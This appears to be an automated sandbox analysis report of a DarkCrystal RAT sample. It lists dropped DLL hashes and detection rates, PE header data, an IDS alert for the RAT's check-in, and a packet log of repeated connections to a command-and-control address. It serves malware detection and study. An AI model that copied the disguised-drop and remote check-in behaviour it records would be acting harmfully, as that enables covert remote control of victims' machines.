                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):38912
                                                      Entropy (8bit):5.679286635687991
                                                      Encrypted:false
                                                      SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                      MD5:9E910782CA3E88B3F87826609A21A54E
                                                      SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                      SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                      SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):50176
                                                      Entropy (8bit):5.723168999026349
                                                      Encrypted:false
                                                      SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                      MD5:2E116FC64103D0F0CF47890FD571561E
                                                      SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                      SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                      SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):24576
                                                      Entropy (8bit):5.535426842040921
                                                      Encrypted:false
                                                      SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                      MD5:5420053AF2D273C456FB46C2CDD68F64
                                                      SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                      SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                      SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):33792
                                                      Entropy (8bit):5.541771649974822
                                                      Encrypted:false
                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):89600
                                                      Entropy (8bit):5.905167202474779
                                                      Encrypted:false
                                                      SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                      MD5:06442F43E1001D860C8A19A752F19085
                                                      SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                      SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                      SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 16%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):126976
                                                      Entropy (8bit):6.057993947082715
                                                      Encrypted:false
                                                      SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                      MD5:16B480082780CC1D8C23FB05468F64E7
                                                      SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                      SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                      SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):39936
                                                      Entropy (8bit):5.660491370279985
                                                      Encrypted:false
                                                      SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                      MD5:240E98D38E0B679F055470167D247022
                                                      SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                      SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                      SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):40448
                                                      Entropy (8bit):5.7028690200758465
                                                      Encrypted:false
                                                      SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                      MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                      SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                      SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                      SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):38400
                                                      Entropy (8bit):5.699005826018714
                                                      Encrypted:false
                                                      SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                      MD5:87765D141228784AE91334BAE25AD743
                                                      SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                      SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                      SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                      Process:C:\Windows\System32\PING.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):502
                                                      Entropy (8bit):4.608377343060015
                                                      Encrypted:false
                                                      SSDEEP:12:PK5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:8dUOAokItULVDv
                                                      MD5:F228289A53C244D8996584A6EEF803E5
                                                      SHA1:1F26F0AC9A91F14FC7977292C1DC964B31DFB7B7
                                                      SHA-256:D0E6141299C5B2C923C333EC39791BC7B57BE52629E8944D2A8AAD583B7FAF5E
                                                      SHA-512:C3CAF389D84A488D070122C782DA8469CBCDB5D5FDAFCAF82DE6AC3121D437D1AE70FA29A3EE4D648146119B0E07832713AF18AA63FEA2A4B95985A8B5824DF8
                                                      Malicious:false
                                                      Preview:..Pinging 414408 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):4.629619443814358
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                      File name:CPNSQusnwC.exe
                                                      File size:2'670'080 bytes
                                                      MD5:a26ed7dc21bc77f20c0251fa25738d02
                                                      SHA1:8fc82929941d67a20c76976e796feab701795c2f
                                                      SHA256:18e83d9fabe142a751c644f12d223e6c4825912573a352551361abde977d753f
                                                      SHA512:5e8044fd8e78aad306d8ffd3b3bbc6583cc353c8cddda1a15b05a22fcf7815a770482418bdb120c679f784017741e36c87aa5bb053008cc94fe9560b97366838
                                                      SSDEEP:24576:eRDNakc4BcCw7sUL/4cIG5IuUe1QdcqTHmdbBs3eJCZrCsjOEKka+wlFlett6t1:yDNu4BaMcQmQmqyHM6sslnE
                                                      TLSH:F8C57D3439EB502AB173EFB58AE4749ADA6FF6B33B07585E205103864713A81DDC163E
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......(...........(.. ....(...@.. ....................... ).....>J)...@................................
                                                      Icon Hash:00928e8e8686b000
                                                      Entrypoint:0x68d48e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x28d43c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x28e000 | 0x370 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x290000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x28b494 | 0x28b600 | ff35990863e41a2468c3f34f3efc3ae1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x28e000 | 0x370 | 0x400 | 2ffb75f85312317934221c41dbe5a9af | False | 0.37890625 | data | 2.865400005536527 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x290000 | 0xc | 0x200 | e29151928ba60d3dd3e3d251c127866b | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x28e058 | 0x318 | data | | | 0.44823232323232326
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-13T14:32:37.532082+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.6 | 49753 | 45.88.91.89 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Dec 13, 2024 14:32:46.422662020 CET4977880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.469403028 CET804977945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:46.531969070 CET4977980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.599004984 CET4977880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.599308014 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.599365950 CET4977980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.719094992 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:46.719171047 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.719294071 CET804977845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:46.719347954 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.719350100 CET4977880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.719767094 CET804977945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:46.719933033 CET4977980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.839107037 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:47.063344002 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:47.183643103 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:47.183665991 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:47.183706045 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:47.806603909 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:47.922563076 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:48.041188002 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:48.168387890 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:48.227288961 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:48.347330093 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:48.350087881 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:48.351617098 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:48.471535921 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:48.703907013 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:48.824039936 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:48.824064016 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:48.824100971 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:49.436192036 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:49.531940937 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:49.669106960 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:49.808192968 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:49.808619022 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:49.928390026 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:49.928462029 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:49.928474903 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:49.928554058 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:49.928683043 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:50.048319101 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:50.282066107 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:50.402111053 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:50.402126074 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:50.402137041 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.031677008 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.141447067 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.278587103 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.333734989 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.344541073 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.453571081 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.453676939 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.455820084 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.575643063 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.813321114 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.819943905 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.933540106 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.933571100 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.939778090 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.939847946 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.940047979 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:52.059746027 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:52.297672987 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:52.417716980 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:52.417728901 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:52.417737961 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:52.539679050 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:52.735060930 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:52.777343988 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:52.844423056 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.025230885 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.141324043 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.261082888 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.344424963 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.391959906 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.392047882 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.392074108 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.392457008 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.512227058 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.512260914 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.512290001 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.512335062 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.512461901 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.512708902 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.512758017 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.512761116 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.512814999 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.632540941 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.860172033 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.980097055 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.980113029 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.980123997 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:54.614403963 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:54.698949099 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:54.833034039 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:54.988498926 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:54.988821030 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:55.109699965 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:55.109801054 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:55.109829903 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:55.109868050 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:55.110008001 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:55.229805946 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:55.469564915 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:55.589593887 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:55.589662075 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:55.589694023 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:56.300745964 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:56.429641962 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.533082962 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:56.625718117 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.661988974 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.662482977 CET4981380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.782111883 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:56.782172918 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.782247066 CET804981345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:56.782310963 CET4981380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.782488108 CET4981380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.902395964 CET804981345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:57.141463041 CET4981380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:57.261640072 CET804981345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:57.261682034 CET804981345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:57.261737108 CET804981345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:57.782799006 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:57.784925938 CET4981380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:57.902725935 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:57.903204918 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:57.904215097 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:57.905163050 CET804981345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:57.905219078 CET4981380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:57.909080029 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:58.024250984 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.029702902 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.029772997 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:58.030399084 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:58.150702000 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.250763893 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:58.372133017 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.373184919 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.375778913 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:58.495656967 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.495668888 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.495680094 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.989263058 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.116645098 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.125713110 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.229100943 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.328823090 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.328911066 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.351181984 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.391419888 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.472065926 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.472285032 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.472453117 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.592369080 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.592428923 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.592462063 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.592494965 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.592679977 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.593112946 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.593259096 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.712385893 CET804982245.88.91.89192.168.2.6
